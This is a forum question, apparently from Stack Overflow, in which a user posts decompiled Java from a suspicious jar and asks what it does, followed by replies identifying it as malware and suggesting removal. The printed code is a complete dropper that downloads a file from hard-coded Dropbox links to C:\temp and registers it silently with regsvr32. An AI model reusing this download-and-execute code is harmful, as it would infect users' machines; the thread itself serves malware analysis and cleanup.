# Please some one explain me the output of this JAVA code DO NOT RUN THIS CODE IT WILL STEAL PASSWORDS

Tags: java, file, url, path, connection

This is a jar executable file I just obtained. It looks like a some kind of a virus. stealing passwords. I think. but I dont know what it actually do. I decoded it by a software and obtained the code. 
so can some one please just look at this code (DO NOT RUN IT) and just explain what is actually done in this code?

```
public static void Run() throws IOException
{
    int i = 3;
    while (i < 9)
    {
        Runtime.getRuntime().exec("regsvr32 /s C:\\temp\\YQJHBJX.PWY");
        i++;
    }
}

public static void main(String[] args) throws Exception
{
    new File("C:\\temp\\").mkdir();
    File localFile = new File("C:\\temp\\YQJHBJX.PWY");
    if (localFile.exists())
    {
        Run();
    }
    else
    {
        String[] arrayOfString1 = "f6pb6ya5e5vc0q5/d.dat?dl=1@@@21urb4zg9n2on4s/d.dat?dl=1".split("@@@");
        for (String str1 : arrayOfString1)
        {
            URL localURL = new URL("https://dl.dropboxusercontent.com/s/" + str1);
            HttpURLConnection localHttpURLConnection = (HttpURLConnection)localURL.openConnection();
            localHttpURLConnection.connect();
            if (localHttpURLConnection.getResponseCode() / 100 == 2)
            {
                String str2 = "https://dl.dropboxusercontent.com/s/"+ str1;
                String str3 = "C:\\temp\\YQJHBJX.PWY";
                goToWeb(str2, str3);
                break;
            }
        }
    }
}

public static void goToWeb(String paramString1, String paramString2) throws IOException
{
    System.out.println(paramString1);
    System.out.println(paramString2);

    InputStream localInputStream = URI.create(paramString1).toURL().openStream();
    Files.copy(localInputStream, Paths.get(paramString2, new String[0]), new CopyOption[0]);

    Run();
}
```

Comment: Yes, this does look like malware. Get rid of it. Give your machine a good cleansing. If you need help with that, Super User would be a better site - do some research there first for first aid to your computer.

Answer (score 0, accepted):

It's downloading a most likely malicious file from dropbox and registering it as a DLL. Exploit is in that file: "C:\temp\YQJHBJX.PWY" unregister it with regsvr32 /u and delete it if it exists.

Comment: I did what u told. i just typed this and ran regsvr32 /u C:\\temp\\YQJHBJX.PWY but this error comes "the module C:\\temp\\YQJHBJX.PWY was loaded but the entry-point DllUnregisterServer was not found make sure that C:\\temp\\YQJHBJX.PWY is a valied Dll or OCX file and try again" what that means?